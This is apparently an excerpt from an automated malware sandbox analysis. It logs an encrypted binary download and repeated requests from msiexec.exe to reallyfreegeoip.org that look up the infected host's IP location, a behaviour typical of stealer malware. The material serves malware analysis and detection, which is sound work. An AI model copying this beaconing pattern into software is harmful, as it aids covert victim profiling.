                                                                                              X-Goog-Hash: crc32c=TJH0Sw==
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close
                                                                                              2024-10-24 10:03:06 UTC4917INData Raw: dc 1e 6c 4b 75 58 61 0a 55 a2 96 8e 2e 2d c2 0b 3a 09 61 3c 07 60 fd c9 f1 87 81 30 be fb cf 97 0a 0b 90 5d 18 12 72 7a ca c3 b5 f8 aa 66 c7 2e 5f b1 68 cc bf 61 f0 a3 11 3a af dc cb 53 99 51 7f b7 13 5f af 04 78 7d ed a3 12 0e 16 04 24 7b 4a 6f 57 ed 3f d7 bb 7f 7b 27 d0 69 d6 1e b9 64 3b 16 d2 f4 59 ef 22 30 fe dd b9 34 a6 9c 39 4b 21 1e 7c c0 39 0d f0 bf 94 ce c7 44 b1 ba d3 00 55 13 d3 46 c3 ec 45 dd ed f4 3e cb 7c 00 19 52 ab a4 4b 48 7c 86 f4 81 3b 91 8f 92 5d 89 bb c2 91 f4 12 76 fd 08 54 b6 09 69 21 ef 77 6a 1b a3 a1 a1 a3 a5 cd fa 3e 95 69 e3 46 46 2d 4a 38 07 5e b4 53 8c 7e 90 de 1e 00 6c fa 1e 4d 90 b9 8a 84 16 48 59 20 db 4b 2e ef e2 48 7e 2a cf 96 4a e8 dd b7 3c 5c 81 15 82 83 0f c7 1b 22 95 70 26 8b c5 b6 be 76 2f eb 27 d6 b0 24 21 08 18 f7
                                                                                              Data Ascii: lKuXaU.-:a<`0]rzf._ha:SQ_x}${JoW?{'id;Y"049K!|9DUFE>|RKH|;]vTi!wj>iFF-J8^S~lMHY K.H~*J<\"p&v/'$!
                                                                                              2024-10-24 10:03:06 UTC4865INData Raw: af 98 d3 4f 83 f6 a5 6f a1 85 91 87 8e a3 e0 ca 2c ff cf 16 08 7b b9 68 05 82 60 b5 94 0a 5a 57 ca 22 d0 75 94 08 b7 3d db 31 1b 77 78 62 29 59 6c 13 5d 8f f7 7d bf 78 04 5d 26 2f 0b 1b c2 7b 6d fe eb 93 51 c6 ac ee 2a 84 de 4e 7e 16 07 e3 be 0f 4f a1 91 2b 3b 7c a4 5e 29 ce b0 25 69 21 5d 23 2c 9c 1a ae f9 4d d2 76 34 0d dc df 9d 4e af c7 2a 92 89 5a 99 67 11 b8 f3 fe 1a b7 83 5f a6 07 17 21 e9 a3 18 61 8d fb 24 71 f2 68 48 fd b2 88 bb 7f 3a 48 b5 69 d6 14 b9 63 3c 79 b4 f4 59 e5 25 5f 99 dd b9 3e c9 f4 39 4b 2b 12 7c b3 50 0d f0 b5 87 ca c7 55 35 b2 c4 73 31 0c 69 42 d0 5d 4c 01 c9 3f 54 87 b1 2b 5e 3c d3 d1 69 57 62 e9 93 f9 5a 22 a1 f1 2d e1 f9 a5 f4 d2 1f 12 dd 7a 2b d8 f5 11 4b a0 5e 25 48 89 c1 10 c9 c0 f2 f2 1f 97 5c e6 29 47 2d 4a 32 07 d2 2f 5d
                                                                                              Data Ascii: Oo,{h`ZW"u=1wxb)Yl]}x]&/{mQ*N~O+;|^)%i!]#,Mv4N*Zg_!a$qhH:Hic<yY%_>9K+|PU5s1iB]L?T+^<iWbZ"-z+K^%H\)G-J2/]
                                                                                              2024-10-24 10:03:06 UTC1322INData Raw: 7e 0d d8 00 10 e2 55 d5 0c aa 10 5a a6 89 97 cf c9 fd 8e 36 24 4e cb 8c 3f 3d 78 1b 8d c5 82 70 54 22 4d be 9d 54 d1 28 c8 c5 57 bd 03 04 50 db 03 14 60 fd 94 e0 17 a6 2a 84 64 1d cd 7b 79 9f f8 0e f4 3d 6c aa 40 09 33 17 3f 64 70 55 65 6f eb 2d eb f0 5d f5 d0 f8 fc bf 24 32 6c 4f ad 0b e5 9a 7d db f1 8b 08 80 fe 67 e1 47 ac 12 ce f2 d1 a5 d9 4f 5b 47 73 4a 89 bb 91 96 8c c2 b5 da 04 ed e7 a2 02 a5 b3 1a 5f 92 60 84 f0 51 5a 55 c0 4d 17 2f 94 02 b7 1b d2 2c 96 a6 79 62 28 72 7a 61 69 80 f7 0d 1d 5f 13 75 92 82 0a 11 60 45 75 8c a5 54 50 b6 0e c5 33 fa e6 4e 7e 12 a5 c6 a4 7d 3d af 91 5b 99 8e be 20 03 16 b1 21 cb 14 41 51 ac d6 1a de 5a 7e 97 75 34 b6 b3 17 9d 5d a5 c7 45 ae 89 72 fe 14 d8 b2 f8 f3 21 e4 fd 6e ac 04 7c 0f be a1 12 7e ff d3 a5 7b f2 65 41
                                                                                              Data Ascii: ~UZ6$N?=xpT"MT(WP`*d{y=l@3?dpUeo-]$2lO}gGO[GsJ_`QZUM/,yb(rzai_u`EuTP3N~}=[ !AQZ~u4]Er!n|~{eA
                                                                                              2024-10-24 10:03:06 UTC1378INData Raw: 76 b6 97 ba e6 66 01 5a bb 06 61 9f df c5 d9 af 2d 1b 11 64 12 b8 15 c1 37 cb 3f e2 34 9d 28 04 25 c8 47 e4 35 5e 03 34 af 4e af f0 a9 5b cd ba 22 4c ac d9 dd 9a a6 67 e4 f1 a0 11 df b1 a0 9c aa 3e c9 74 f9 9d 1b d6 4f 05 02 f1 14 28 6d 33 fb 76 7a 1a f1 0e c2 a4 90 4c 19 8a 03 d4 1c 20 83 1a de 7e dc 73 60 3c d2 34 80 e7 b4 98 a1 54 51 51 07 31 10 b8 3b 24 71 6e 49 98 e6 fd 82 5e 22 b1 51 77 e5 be 11 fb 3d 6e a7 a1 ec 32 f2 05 49 6d f4 5e 46 0d 24 16 57 cb 91 1e ce ae 81 0a 91 0e 49 6c a4 10 02 57 c8 ac 7e 7c c6 0d 61 00 85 ae 7e 57 f8 9a 2c ce a7 e7 94 f3 e8 4a c3 a5 53 ef 9c af 57 76 9b 88 db db 59 e0 ee b0 4c d8 54 4f 3d bf 4b 09 07 62 ad 6b 9d de 12 7b 7f 35 2a 3d 00 e4 eb 71 c2 32 38 6c ef f7 98 d5 23 b5 29 db fa 1b 14 a5 bb 7f 71 70 bd d2 bf 32 d7
                                                                                              Data Ascii: vfZa-d7?4(%G5^4N["Lg>tO(m3vzL ~s`<4TQQ1;$qnI^"Qw=n2Im^F$WIlW~|a~W,JSWvYLTO=Kbk{5*=q28l#)qp2
                                                                                              2024-10-24 10:03:06 UTC1378INData Raw: e0 f9 1d 09 ea e1 06 3a 28 d6 9b d4 87 f9 ff cc a4 f8 e1 76 de 3a 2f 80 9c a8 71 3f 3c 16 8c e3 a2 44 41 d0 cf 0a eb 6d 8c 8b b5 3c ac 60 d0 7c 97 91 36 ce d2 dd 2a 24 87 4c 42 47 c8 31 8a 6a a3 1b db f6 d4 a9 87 85 4a 06 54 63 a7 ea 54 13 4e 17 60 5b 50 da 38 15 12 3f e7 99 32 29 76 44 a5 1b 6a 4e 94 ba 0d 00 a4 5d ed 9f ba 82 74 02 72 94 eb 6c f3 3f bf 10 a3 6e 81 78 a5 da ea 1d d9 b6 ae 06 be da 40 56 7f b2 01 cf 90 a5 fa db e9 b2 1e b5 7e 6a 27 c5 a0 a9 0e b8 ff 09 5d 89 37 a9 74 12 89 23 b3 fd f6 df b2 45 f2 81 26 e6 34 91 93 60 a0 24 1a d2 42 c6 88 3a a5 05 83 41 0c 7e 72 e1 82 dc 11 a0 ae 34 84 e7 b6 3e d8 a0 0f d7 e9 f4 73 31 57 b1 52 5b 7c c5 f0 fd 83 df d6 f4 98 b5 41 5a 02 64 b0 25 c9 43 0a d6 6e 73 91 56 59 25 82 f7 ce 18 99 0b b0 e1 16 66 65
                                                                                              Data Ascii: :(v:/q?<DAm<`|6*$LBG1jJTcTN`[P8?2)vDjN]trl?nx@V~j']7t#E&4`$B:A~r4>s1WR[|AZd%CnsVY%fe
                                                                                              2024-10-24 10:03:06 UTC1378INData Raw: 06 8f 97 c8 26 18 5e 35 dd 6d 38 5f 10 ed 99 ef 85 80 4c 2c 36 29 07 be 87 b9 c5 3e 52 a9 d6 f7 16 91 c4 8c 52 d2 e8 03 e5 be 07 c7 4c 92 8c ca 24 72 27 4a da 3b 03 02 27 e0 66 2e 8b c4 9c 41 1d 78 a9 55 b1 71 99 3e da 15 d3 e6 28 55 cd 30 b1 fc c2 04 43 5b 11 63 f9 bc 51 bf 3b 4f 75 cb a3 e9 06 0b dd 89 bd 38 4f 88 04 b5 86 aa 40 b1 47 ed 7e b5 37 d1 cc 2a 7a 8d d0 02 82 19 d5 66 a6 1d c8 40 f9 8c c2 e9 92 5f b5 5e bf 77 f8 00 e9 d9 e8 fb 2e f1 b0 c5 0d ce 36 12 4f 28 a0 5a 33 27 5e 86 f8 d8 be b5 f9 98 a6 06 3d c3 81 37 97 cf c2 fd 2e 1c e3 b4 86 a0 47 b4 70 33 4e 64 cf 23 f5 eb d6 c3 6d 1a e5 b0 0b 46 99 fe f3 00 21 c8 9e e2 dc 5a a7 a1 2b 56 ef 46 b1 ed 4c 2a 08 19 b3 ac 42 88 21 5c d1 b9 c6 d2 9a 1a a1 76 1c 51 7d 5c 4a a5 44 82 f8 6c 13 97 e5 75 66
                                                                                              Data Ascii: &^5m8_L,6)>RRL$r'J;'f.AxUq>(U0C[cQ;Ou8O@G~7*zf@_^w.6O(Z3'^=7.Gp3Nd#mF!Z+VFL*B!\vQ}\JDluf
                                                                                              2024-10-24 10:03:06 UTC1378INData Raw: 74 76 ad c5 69 1c 32 d7 5a 17 48 08 e1 b7 8b 7a 91 b4 0a 4a c0 73 95 64 b7 94 d5 44 14 ff 5c 61 b1 9d 51 38 8e 6d 93 91 68 57 d8 ab 96 22 9d b7 3e e9 46 71 9a 8b 4d ed 58 b5 2c 57 a1 52 00 6c 58 85 41 0e 06 28 07 a8 69 ce e7 81 63 6c 23 5b c5 72 a0 8d 0f 5d ae c0 99 5a b9 5f 1f 57 73 7b cc 35 53 81 b8 73 6b c1 90 4a d6 21 42 71 4d 95 09 69 ea 58 77 12 cb 6d e7 f4 d0 99 7a fd 0d b6 af 87 af 50 3a ae f9 7d 1e 9c 62 78 c1 45 e7 53 86 3c 5a bd 8b 91 01 49 fa e3 e5 91 0c 0a f5 49 ff b1 7c 6a 47 ba 65 9a 82 03 36 3e 44 2a a4 d1 68 ec 69 ca 7a 96 5e 02 4f 10 2d e8 09 ba 8c a3 19 81 ab 5e 50 b9 d8 32 e1 f8 1f 95 5e 87 fe 8a 3b ca 86 e5 43 b4 42 43 9a 2a bc ed ff 7f b8 20 a2 df 88 72 39 28 72 a1 aa 35 e5 d7 e7 15 7d 73 a8 76 69 74 15 d3 d8 c5 fc 65 94 4f 76 3c 43
                                                                                              Data Ascii: tvi2ZHzJsdD\aQ8mhW">FqMX,WRlXA(icl#[r]Z_Ws{5SskJ!BqMiXwmzP:}bxES<ZII|jGe6>D*hiz^O-^P2^;CBC* r9(r5}sviteOv<C
                                                                                              2024-10-24 10:03:06 UTC1378INData Raw: 3c a3 2b 37 43 79 0f 25 69 3b 5d 23 2b b6 a5 ae f8 5c ef 7c 3c aa d4 51 f4 32 f1 c7 3b 98 89 7b 95 cd 11 b2 f2 f9 ec e1 83 56 80 03 71 12 e8 a3 12 04 e9 27 fa 68 d7 47 63 ed 3f dd a8 7b 3b 0f b2 69 d6 14 64 07 3d 16 d2 f4 59 ef 5c 02 fe dd bd 46 f1 9e 39 3b 37 36 fd c0 39 07 e6 41 95 dd c2 55 34 83 19 02 5b 0c 17 67 c3 58 48 62 fd 4e 3f f7 a7 09 cc 3a c2 dd 7d c6 0f fa 95 e2 5c c5 9f f0 3c e7 d5 b9 1b d2 4d 13 dd 7c 52 18 29 00 45 e7 f2 25 48 89 cc bd 05 c0 e3 fd 20 98 5c e4 38 7c 2d 4a 3c 74 cd f1 53 86 5d 55 dd 1e d3 e9 7b 7f 22 55 b9 8a 8e 68 75 59 c0 df 26 e9 e4 e3 12 7e 3b d4 e0 10 f8 c9 c7 14 e8 81 15 88 5f 44 d3 1b 52 9d 2b 26 8b 8f dd 79 76 2f a1 27 c7 97 39 ac 48 1a f7 89 bb 50 7d 2c e4 76 01 69 78 60 f5 5e 3b b6 70 55 c0 8c bb 51 4a 1e 86 2e 7c
                                                                                              Data Ascii: <+7Cy%i;]#+\|<Q2;{Vq'hGc?{;id=Y\F9;769AU4[gXHbN?:}\<M|R)E%H \8|-J<tS]U{"UhuY&~;_DR+&yv/'9HP},vix`^;pUQJ.|
                                                                                              2024-10-24 10:03:06 UTC1378INData Raw: f4 aa be cc 1f f0 db bb 63 27 c1 76 36 19 4b 14 08 0e 89 dd d1 b7 fd 91 35 42 12 c0 3e 78 aa 5e 9b 4c 22 63 ed f3 df be e5 f2 c6 6a e9 e2 60 31 e3 97 ba 9d ed a1 1c 14 fc 60 4d 09 54 d6 67 ee e4 c3 48 0b cc 72 3f f4 d0 7d d2 db 0e 89 ea 3b 83 6a ae 5c 16 55 40 10 9c 66 f0 1a dc 78 1a a4 f9 45 fc f6 54 3a 36 2e 52 97 a8 34 49 27 12 b4 76 22 55 4d 22 5a be 9d 54 01 3c d0 b7 1c a8 2b f5 f2 f3 7c 02 9e f6 94 c4 10 89 65 b4 65 17 cd 5b 6d 6d fe 33 dc 4a 6a d9 8a 09 33 63 28 a5 70 51 7e 4d ea d5 fc f0 27 98 c7 e9 f4 c5 36 7b 6c 4b d4 d9 c6 e4 37 b4 35 8f 20 b4 fe 76 ef 28 b7 02 eb d0 9b 98 d9 45 4c 0c b5 62 eb b1 91 8d 5a b0 ef ca 04 e3 f8 16 02 a1 cb 3f 2d 82 10 e2 f0 8b 5a 55 c0 34 2e 2e 87 2d a6 2f f6 6d 06 6b 39 62 29 56 49 05 2f 73 e2 7d cf d8 21 4a 0e 36
                                                                                              Data Ascii: c'v6K5B>x^L"cj`1`MTgHr?};j\U@fxET:6.R4I'v"UM"ZT<+|ee[mm3Jj3c(pQ~M'6{lK75 v(ELbZ?-ZU4..-/mk9b)VI/s}!J6
                                                                                              2024-10-24 10:03:06 UTC1378INData Raw: 64 6b 65 ac 9b a2 98 d3 da b7 21 3e 04 47 7c 4a 17 08 1b 6b 8a 61 21 1b 14 c2 4f 06 1e dd 7e ce d2 0b 5a cf 98 44 87 a9 f8 1f af 5d b3 27 6c 12 b1 15 c1 37 1b 4d fa 46 9f 31 2c d4 6a 62 f5 5d 8a 02 27 b9 fd 98 c0 d7 ca d3 ad 3d 24 84 ac d7 9a ac 23 b3 f1 b1 0a da ff 71 11 ea 34 c9 75 cd 9a 17 5c 5d 05 76 7b fa 3f 45 8d 94 ba 70 b8 de 16 a1 fb e1 76 69 28 22 b3 59 18 83 1e a9 60 f9 69 18 68 1c 34 f0 4f 9c fc b0 45 57 2d eb 27 38 c4 3b 35 77 01 a6 98 ea f7 82 a8 45 94 79 49 e5 be 65 d7 2e 6e 8b d2 cd 40 1a c9 49 1d 8a 41 46 0d 5e 0b 1e cb 95 66 88 8e ff 3a 87 26 cc 44 9a 1a 14 af c9 61 7a 48 fa 00 9a 01 8f bd 40 da 90 f8 2c cf 88 2f e6 0f fd 4a cd 30 76 f8 b0 69 00 74 91 5a e8 eb aa ae e1 ba 2a 84 70 45 67 96 6f 25 5f dd 05 31 ef e5 10 5e 19 e5 3b 29 7e b4
                                                                                              Data Ascii: dke!>G|Jka!O~ZD]'l7MF1,jb]'=$#q4u\]v{?Epvi("Y`ih4OEW-'8;5wEyIe.n@IAF^f:&DazH@,/J0vitZ*pEgo%_1^;)~


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.2249165188.114.97.34432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:10 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 10:03:10 UTC894INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:10 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30138
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=063V9aa%2Bc6hkyi%2FJGO4e61gKnfad8HfPC5RHXmq1MWQjFOZ1EusZEv4NgLiJHBVVEP1l67MjGA5ezxDpRudvy7aahXBBGW0Q6ZQezlRtZDp1JzYBFwD4OTGGJbyZkYs3UuY%2FqtSX"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d7922ad7a9b2cc9-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1408&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1766931&cwnd=251&unsent_bytes=0&cid=3265bcc1f8416b91&ts=177&x=0"
                                                                                              2024-10-24 10:03:10 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                              Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                              2024-10-24 10:03:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.2249166188.114.97.34432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:11 UTC63OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              2024-10-24 10:03:11 UTC894INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:11 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30139
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62tk6g1PJMzqr7Nr1WuSEiem3AlOIW%2FkySUwYkRUqDxuPuqpj5wGb1l8ehxluAVmh8ohHSAIgzImGGdac8SJURlv8%2F2TtprLWrF3khBHvW6NctphnvhjBLM0oLEbKmgIq%2BpYgN0q"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d7922b48d7ae853-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1328&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2075985&cwnd=251&unsent_bytes=0&cid=1c899a76ef2f633b&ts=149&x=0"
                                                                                              2024-10-24 10:03:11 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                              Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                              2024-10-24 10:03:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.2249168188.114.96.34432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:13 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 10:03:13 UTC902INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:13 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30141
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mIH49O7l%2FiqMdpGXdXgnqaT9ZTFmvZEGgy7geGK27RKB45t%2Fpx%2FTduit0ISV%2F9beDwemULkGQJ00iDArImRlAzqTRGh4%2FqNaa0NSv9X%2B417Gx3vdzBFs6jFYKQo%2Bej6MU3d3jIp5"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d7922c06bb56b15-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1154&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2503025&cwnd=251&unsent_bytes=0&cid=63f2f8987ccf32ad&ts=145&x=0"
                                                                                              2024-10-24 10:03:13 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                              Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                              2024-10-24 10:03:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.2249170188.114.96.34432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:15 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 10:03:15 UTC898INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:15 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30143
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G4C%2BYX2D5lS9rnIsEqqbPx2BfnSIHZhSxW9bZAOHosgGyOQ46%2FHrR%2FkQTdJqeJ%2FepXuM9fMySus7Ffk00zS5jgBNi4epmV1O5xC5IQdoiS%2Br00vGfjAfNlDyMW3sfaoxP9zX557s"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d7922ce8f704600-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1788&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1520209&cwnd=251&unsent_bytes=0&cid=fcdc53a0a1ca5743&ts=396&x=0"
                                                                                              2024-10-24 10:03:15 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                              Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                              2024-10-24 10:03:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.2249172188.114.97.34432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:17 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 10:03:17 UTC908INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:17 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
